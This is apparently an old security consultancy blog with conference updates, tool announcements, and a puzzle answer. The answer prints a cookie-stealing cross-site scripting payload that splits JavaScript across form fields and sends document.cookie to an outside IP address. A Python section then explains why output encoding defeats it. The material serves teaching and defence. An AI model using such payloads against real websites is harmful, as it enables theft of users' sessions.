
Sun, 28 Dec 2008

... Scrapy...

(an open source web crawling and screen scraping framework written in Python..)

i promised deels i wld stay off the interwebs for a few days, which means my quick stops are filling up my bookmarks list..

This looks worth checking out.. http://dev.scrapy.org/

/mh

Mon, 30 Jul 2007

BlackHat Progress Report

(always wanted to say that!)

Two SensePost training sessions are over, and as I type the weekday sessions are at about 50%. Feedback so far has been pretty cool and it's been fun to meet new people / bump into some old friends..

The next "biggie" on the horizon is Wednesday's talk.. We have had a fair bit of interest so far and even though the slot has some stiff competition it seems like all will be well :). The talk should be interesting to developers, pen-testers and even just people with a vague interest in seeing cool stuff.. Marco has been adding functionality to "squeeza" like a demon and as it stands it's probably the only SQL Injection tool I know that will allow (file downloads, arb SQL queries, database mining) all purely in T-SQL over a variety of transport channels (DNS, error messages, timing). We will post the link to it for download just before we talk..

If you are at the briefings, catch us on Wednesday @ 11h15 in the Tiberius Ballroom (3+4+7+8) (that beeeeg!) :>

Till then, here's the summary of our about:us slide

/mh

Suru version 1.2 Beta

Suru version 1.2 beta is a fairly comprehensive upgrade to Suru, our MITM assessment tool.

Suru version 1.2 comes with a number of bug fixes and enhancements, including the following:

- Support for upstream proxy servers with basic auth.
- Request timing
- Highlighting of requests in both the request editor and the browser
- Enhanced sorting of requests
- Neater request and fuzz result lists

Suru version 1.2 Beta can be downloaded from http://www.sensepost.com/research/suru

This is a beta version, so we'd really appreciate it if any bugs discovered can be forwarded to research@sensepost.com

Regards,

The SensePost research team.

Fri, 27 Jul 2007

BlackHat, DefCon, Las Vegas

Ok.. so the 2nd plane with SensePost'ers has touched down in Las Vegas and the first cheeze-pizza from the Caesars food court has been consumed.. So little changes in Caesars that it always adds to the surreal feeling that lasts for the entire stay..

We will be in the training rooms over the weekend, and during the week, and will then give our bh-talk, before moving to defcon for the talk there..

In between, as usual, it's a chance to meet old friends, make new ones and get sun-burnt! Grab us if you see us, and we can grab coffee/beer/chocolate-milk..

I'd like to promise that we will blog interesting talks.. but in the normal BlackHat/DefCon madness, it will probably only happen when we get back home.. Instead I promise to try, so watch this space (always wanted to say that!)

/mh

Tue, 24 Jul 2007

QoW 1 answered; QoW 2 released

A little while back we published our first public QoW for your abuse and enjoyment, and the time to close it is .......... now. The new QoW is available here. Thanks for the efforts; we received a fair number of answers and are still figuring out how to go about recording your submissions. For now, we'll publish the first correct answer, and discuss the answer in brief. Over to Haroon:

Jeremiah Grossman was the first with a correct answer, with valiant attempts from many others.. Acceptable solutions involved either the use of JavaScript / HTML comments to allow our injection to span multiple lines (or really really small URLs :>)

An additional bonus for the attacker was that the form would accept as many name/value pairs as were submitted and return them all in the table, allowing us to add variables forever..

The original solution was therefore to submit:

http://qow.sensepost.com/cgi-bin/qow1/qow1?
name=<script>a='"http://'/*
&
address1=*/b='168.210.134.1/'/*
&
address3=*/c='?"+document'/*
&
moo1=*/d='.cookie'/*
&
moo2=*/f='document.location='/*
&
moo3=*/eval(f+a+b+c+d)/*
&
moo4=*/</script>

Effectively we build our JS command so that each fragment fits into the imposed per-field char limits, and eventually use eval() to pull them all together..

In our example we use it for a simple document.location to move off the cookie, but at that point the world is your oyster..
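To make the defensive lesson of the answer concrete, here is an added example (not part of the original post or of the QoW CGI) that takes the query string quoted above, shows that every fragment individually passes a per-field length check, and contrasts a reflecting renderer that echoes values raw (where the browser sees the fragments stitched into one script) with one that HTML-escapes them. The table layout and the 30-character field limit are assumptions for illustration only.

```python
"""Added example: why per-field length limits alone do not stop reflected XSS,
and why output encoding does. Query string copied from the QoW 1 write-up; the
rendering functions and FIELD_LIMIT are assumptions, not the original CGI."""
import html
import re

# The URL from the post, joined onto one line (query part only).
QOW1_QUERY = (
    "name=<script>a='\"http://'/*"
    "&address1=*/b='168.210.134.1/'/*"
    "&address3=*/c='?\"+document'/*"
    "&moo1=*/d='.cookie'/*"
    "&moo2=*/f='document.location='/*"
    "&moo3=*/eval(f+a+b+c+d)/*"
    "&moo4=*/</script>"
)

FIELD_LIMIT = 30  # assumed per-field limit; the post does not give the real number


def parse_fields(query):
    """Split on '&' and the first '='. The payload has no percent-escapes, so no
    decoding is applied (a real CGI library would also turn '+' into a space)."""
    fields = []
    for part in query.split("&"):
        key, _, value = part.partition("=")
        fields.append((key, value))
    return fields


def within_limit(fields, limit=FIELD_LIMIT):
    """A per-field length check: every fragment passes on its own."""
    return all(len(value) <= limit for _, value in fields)


def render_vulnerable(fields):
    """Echo every name and value raw into a table cell, as the post describes."""
    rows = "\n".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in fields)
    return f"<table>\n{rows}\n</table>"


def render_hardened(fields):
    """Same table, but HTML-escape both name and value before reflecting them."""
    rows = "\n".join(
        f"<tr><td>{html.escape(k, quote=True)}</td><td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in fields
    )
    return f"<table>\n{rows}\n</table>"


def extract_script(page):
    """Approximate what the JS engine sees: the first <script> body with /* */
    comments removed. A comment that spans a line break counts as a line
    terminator for automatic semicolon insertion, so it becomes a newline."""
    match = re.search(r"<script>(.*?)</script>", page, re.S)
    if not match:
        return None
    return re.sub(
        r"/\*.*?\*/",
        lambda m: "\n" if "\n" in m.group(0) else "",
        match.group(1),
        flags=re.S,
    )


if __name__ == "__main__":
    fields = parse_fields(QOW1_QUERY)
    print("every field within limit:", within_limit(fields))
    print("script in vulnerable render:\n", extract_script(render_vulnerable(fields)))
    print("script in hardened render:", extract_script(render_hardened(fields)))
```

The length check reports True for every field, yet the raw render yields a six-statement script ending in the eval() call, because the table markup between cells is swallowed by the comments. The escaped render contains no script element at all: the fix is encoding on output, not counting characters on input.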

Ah well.. on with the show.. :>